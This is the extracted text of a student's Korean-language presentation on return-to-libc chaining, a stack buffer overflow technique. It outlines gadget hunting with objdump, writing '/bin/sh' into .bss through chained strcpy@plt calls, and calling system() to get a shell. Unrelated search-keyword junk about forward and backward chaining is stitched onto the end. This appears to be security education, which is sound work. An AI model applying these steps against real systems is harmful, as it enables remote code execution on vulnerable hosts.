RTL Chaining sangjun123naver com Contents n n RTL Slides: 18 Download presentation RTL Chaining 송상준 sangjun_123@naver. com 서초고등학교 Contents n 자기소개 n RTL Chaining n Demo 자기소개 n n 서초고등학교 2학년 Best of the Best 4기 교육생 정보보안팀 Hack. Cat 소속 s 0 ngsari. tistory. com Return to Libc [*] First, Get Library Address, Library argument print libraryname find &system, +9999, ”/bin/sh” Return to Libc [*] Finally, Just Attack! - Buffer[? ] + SFP[4] + system + exit + /bin/sh system(“/bin/sh”) -> exit(0); RTL Chaining [*] First, Find Gadget(pop. . ret) Usage: objdump –d. /binary pop ret = 0 x 0804852 f pop ret = 0 x 0804852 e RTL Chaining [*] Second, Find 1 byte char(/bin/sh) Usage: objdump –s. /binary | grep “/” – 0 x 08048154 (/, b, i, n, s, h, x 00)을 모두 구해야함 RTL Chaining [*] Third, Find. bss Address Usage: objdump –h. /binary | grep bss - insert char(/bin/sh) in. bss (custom stack) bss = 0 x 0804 a 028 bss size = 1028 byte RTL Chaining [*] Fourth, Find vuln@plt strcpy@plt = 0 x 080483 a 0 jmp ds: offset은 got주소!! RTL Chaining Finish!! I Have. . [Gadget, character, bss, strcpy@plt, system] Attack Scenario [*] Payload strcpy@plt + ppr +. bss + “/”. . . System + exit + bss C Code? -> strcpy(bss[0], “/”); strcpy(bss[1], “b”); . . . Demo [Environment] - Ubuntu 14. 04 LTS - Netcat Remote Server - gcc –o exploit. c –fno-stack-protector Backward chainingDậy thổi cơm mua thịt cáCơmBackward chainingJess expert systemIndian optical square in surveyingForward chainingContoh kasus backward chainingGive a forward chaining proof of the sentence 7 < 3 9Differenza tra shaping e chainingForward chaining exampleBehavior chain interruption strategyConcatenamento anterogradoHash function codeRow chainingServlet chainingRule-based expert systemQuadratic probingBackward chaining occupational therapy